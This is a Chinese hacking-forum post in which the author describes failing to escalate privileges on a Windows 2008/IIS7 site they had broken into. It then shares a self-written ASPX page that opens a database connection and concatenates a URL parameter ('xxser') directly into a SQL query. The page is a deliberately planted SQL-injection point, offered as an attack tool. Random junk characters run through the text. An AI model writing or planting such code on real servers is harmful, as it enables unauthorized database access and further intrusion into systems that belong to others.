昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。# n- C) ~) A, c/ g# s! V: o% g
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
* B H/ e! W0 O* G; m$ { B7 ~* d* j, j代码量不多,自己写个拉倒了。烦死了。' X$ P- w2 z% X
, S u. W, V! c4 k) y8 W
. l O4 y5 h3 ]2 b. F# t: ~+ Y8 t* R<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
9 w' e: o2 x4 j D$ E, k6 `( q9 h8 m6 D<html xmlns="http://www.w3.org/1999/xhtml">6 I/ W. H2 P! i! z
<head runat="server">
& M: A8 o# p+ q# w+ Y <title>暗影aspx构造注射专用页面</title>1 _! X# n/ a3 H3 u! S0 U
</head>
( j S) M5 X9 _/ {6 S6 d<body>
1 x1 J3 Z( S" e- L" f0 n, D <form id="form1" runat="server">4 Z% _) y$ B4 K3 I
<div>
8 g2 b$ }- Y P& b/ {! H <script language="c#" runat="server">+ a$ s5 g. j% }2 ~% Y3 O2 y% c
$ }% P$ }4 V( W. a# S& j void page_init(object sender, EventArgs e)
* b X% M3 `8 E+ L6 P" M8 h {
/ R/ A% z! p: \) E! A
4 u' X1 E4 L9 a2 c0 Z" s System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();# N) q0 |# n2 N9 Q2 R3 ^
4 U. u) i' E+ Y5 l: q: W" T/ A
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString(); v0 l% e! {, b' w, m
conn.Open();
$ Q. {7 k# r" C% ~$ d ! I/ p& y* J5 }! p* ^
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1% o* ^( B2 I! r4 [* ~/ r3 e
8 I, U1 I0 [5 }9 v6 z
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);, v0 s9 k1 U v7 R+ |0 V
int x = command.ExecuteNonQuery();
3 U5 k# b- ^7 p" X9 g Response.Write(i+"\n");
) `# K1 Q3 U5 H1 Y* l$ D/ C Response.Write(x);
& ?) v" R6 G8 y! T conn.Close();7 a I# i1 N3 x& k3 M" S
}9 s" p; k6 N A8 c
& `! p5 h |3 @2 O: ?7 o
</script>
) q2 o8 M% a \9 g; n3 ~ </div>
. y% L6 s: b6 ]2 y9 V </form>( s! l, U5 o2 _( x: I. V
</body>
# ^# i9 r+ Q$ m5 E( |</html>! r1 k) r( h. r. ~3 N, ~- ~: w0 U
|